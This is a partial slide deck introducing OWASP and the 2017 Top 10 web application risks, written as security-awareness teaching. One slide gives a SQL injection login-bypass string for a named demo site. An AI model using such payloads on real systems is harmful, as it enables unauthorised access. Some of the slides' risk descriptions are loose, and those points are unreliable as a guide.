25. 25
Mark Curphey started OWASP on Sep 9,
2001.
OWASP
The Open Web Application Security Project (OWASP), an online
community, produces freely-available articles, methodologies,
documentation, tools, and technologies in the field of web application
security.
26. 26
OWASP Top 10
OWASP Top Ten - The "Top Ten", first published in 2003, which is
regularly updated.
It aims to raise awareness about application security by
identifying some of the most critical risks facing organizations.
27. 27
Injection
Broken Authentication
Sensitive data exposure
XML external entities.
Broken access control
Security mis-configuration
XSS
Insecure Deserialization
Using component with known
vulnerabilities.
Insufficient logging &
monitoring
OWASP Top 10 - 2017
28. 28
A1- SQL Injection
Un-sanitized input vulnerabilities to pass SQL commands for
execution by a backend database.
It is a flaw in web application and not a DB or web server issue.
Authentication Bypass
Information Disclosure
Compromised Integrity & Availability of Data.
30. 30
SQL Injection Login
URL = http://demo.testfire.net/index.jsp
Username: ' or 'bug'='bug
Password: ' or 'bug'='bug
31. 31
A2 - Broken Authentication
Password Exploitation
Predictable login credentials
Session ID in URLs
Timeout exploitation
User authentication credentials are not protected when stored.
32. 32
A3 - Sensitive Data Exposure
Application does not protect sensitive information from being
disclosed.
Information such as passwords, credit card data, session tokens, or
other authentication credentials.
33. 33
How to Prevent
Never store or transmit data in clear text.
Use strong, unique passwords for your applications and change them
regularly.
Use the latest encryption algorithms.
Disable autocomplete on forms that collect data.
34. 34
A4 - XML External Entities
Application is able to parse XML input from an unreliable source
because of misconfigured XML parser.
Allows to access protected files & services.
Attacker sends malicious XML inputs containing reference to an
external entity to victim web application.
35. 35
A5 - Broken Access Control
Exploitability - Occurs when the attacker changes the parameter
value for which he is unauthorized.
Technical impact - Privilege escalation
Insecure direct object reference - Exposure of internal
implementation objects.
37. 37
A7 - Cross Site Scripting
Malicious Script Execution
Exploiting user privilege
Data manipulation
Session hijacking
Brute force password cracking
Adds in hidden iframes and pop-ups
39. 39
A8 - Insecure Deserialization
Occurs when untrusted data is used to abuse the logic of an
application
Remediation
Validate the data before using it.
Use of checksum or digital signatures while transferring data b/w
two end points.
40. 40
A9 - Using Components with
Known Vulnerabilities
Applications and APIs using components with known vulnerabilities.
Components, such as libraries, frameworks, and other software
modules, run with the same privileges as the application.
Search of vulnerabilities on exploit sites.
41. 41
A 10 - Insufficient Logging &
Monitoring
Insufficient tracking leads to escape recording of malicious event.
It ignores important details about event.
Sufficient Content
Good format
Response plan
43. 43
Importance Of VAPT
Comprehensive Testing for Applications and Networks.
Identifies the weakest link in the chain.
Eliminates false positives and prioritizes real threats.
Detection of attack vectors missed through manual testing.
Secures against business logic flaws.